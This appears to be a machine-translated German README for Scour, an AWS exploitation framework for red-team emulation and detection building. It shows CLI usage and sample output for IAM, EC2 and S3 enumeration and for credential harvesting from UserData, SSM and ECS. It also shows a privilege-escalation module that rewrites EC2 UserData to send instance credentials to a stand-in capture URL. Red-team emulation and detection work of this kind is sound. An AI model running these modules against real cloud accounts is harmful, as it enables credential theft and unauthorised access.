
Modulbasiertes AWS-Exploitation-Framework für Red-Team-Tests und Blue-Team-Analysen. Emuliert Angriffsmuster in der AWS-Steuerungsebene mit einzigartigem UA-Tracking für die Erkennungsentwicklung.
Dieses Tool wird verwendet, um Angriffsmuster innerhalb der AWS Controlplane zu emulieren. Jeder Angriff wird mit einer spezifischen UA für das blaue Team markiert, um darauf hinzuweisen.
Dies ist noch eine aktive Baustelle. **Viele Fehler
Noch nicht produktionsreif
Wo Sie Probleme melden können: https://github.com/grines/scour/issues
Gepflegt von: grines
Scour ist ein modernes modulbasiertes AWS-Exploitation-Framework, geschrieben in Golang, entwickelt für Tests des roten Teams und Analysen des blauen Teams. Scour enthält moderne Techniken, die verwendet werden können, um Umgebungen anzugreifen oder Erkennungen für die Verteidigung aufzubauen.
Scour ist in golang geschrieben, sodass es einfach als Binärdatei verteilt werden kann.
##Abrufbar
go get github.com/grines/scour
##Erstellen
go build main.go
Für eine detailliertere und benutzerfreundlichere Installationsanleitung besuchen Sie bitte die Wiki's Installationsanleitung. **in Kürze
Scour verwendet eine Reihe von Modulen:
Beim ersten Start von Scour,
token profile <profile_name> <region> listet die verfügbaren AWS-Profile in ~/aws/credentials auf.token AssumeRole <role_name> <region> nimmt eine Rolle aus demselben oder einem anderen Konto an. ** erfordert aktive Sitzunghelp module gibt die entsprechenden Hilfeinformationen für das angegebene Modul zurück. **Hilfe folgtattack evasion <tactic> führt das angegebene Modul mit seinen Standardparametern aus.scour wechselt in den CLI-ModusNot Connected <> token profile apiuser us-east-1 legt die Sitzung für Befehle fest, die eine solche erfordernConnected <apiuser/us-east-1> aktiv mit einem AWS-Profil aus (~,/aws/credentials) in (Region) verbundenConnected <apiuser/us-east-1> attack enum <attack> Tab-Vervollständigung mit Liste der verfügbaren AufzählungstaktikenConnected <apiuser/us-east-1> attack privesc <attack> Tab-Vervollständigung mit Liste der verfügbaren PrivilegienerweiterungstaktikenConnected <apiuser/us-east-1> attack lateral <attack> Tab-Vervollständigung mit Liste der verfügbaren SeitwärtsbewegungstaktikenConnected <apiuser/us-east-1> attack evasion <attack> Tab-Vervollständigung mit Liste der verfügbaren UmgehungstaktikenConnected <apiuser/us-east-1> attack creds <attack> Tab-Vervollständigung mit Liste der verfügbaren Credential-Discovery-TaktikenConnected <apiuser/us-east-1> attack execute <attack> Tab-Vervollständigung mit Liste der verfügbaren Ausführungstaktiken
Connected <apiuser/us-east-1> attack enum IAM IAM-Erkennung+-------------+---------------------+------------------+---------------+--------------+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | | true |
+-------------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles RollenerkennungUA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861******:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2 EC2-ErkennungUA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3 S3-ErkennungUA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true | false | false | | false | | false | |
| bullsecu********* | true | true | false | | false | | false | |
| connect-6ec*****ad67 | false | false | false | | false | | false | |
| connect-******5337c3 | false | false | false | | false | | false | |
| ransom******** | true | false | false | | false | | false | |
| red******** | false | false | false | | false | | false | |
| rep-***** | false | false | false | | false | | false | us-west-2 |
| terraform******* | false | false | false | | false | | false | |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups GruppenerkennungUA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
Connected <apiuser/us-east-1> attack enum Network NetzwerkerkennungTBD

Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data Meta-Daten-Anmeldeinformationen von EC2 stehlen. Instance stoppen / Userdata aktualisieren, um Anmeldeinformationen an die angegebene URL zu senden / Instance starten (sendet EC2-Token an die URL).[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 - State: pending

Connected <apiuser/us-east-1> attack creds UserData Anmeldeinformationen aus EC2 Userdata auslesenUA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID | RULE | FINDING |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+---------------------+------------------+-------------------------------------------------------------------------------+
Connected <apiuser/us-east-1> attack creds SSM Anmeldeinformationen aus Systems Manager auslesenUA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE |
+------------+----------+----------------------+
| Test | text | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS Anmeldeinformationen aus ECS auslesenUA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret | heere | sample-app |
+-------------+-------+------------+
Connected <apiuser/us-east-1> attack persist <attack> Tab-Vervollständigung mit Liste der verfügbaren PersistenztaktikenConnected <apiuser/us-east-1> attack exfil <attack> Tab-Vervollständigung mit Liste der verfügbaren Exfiltrationstaktiken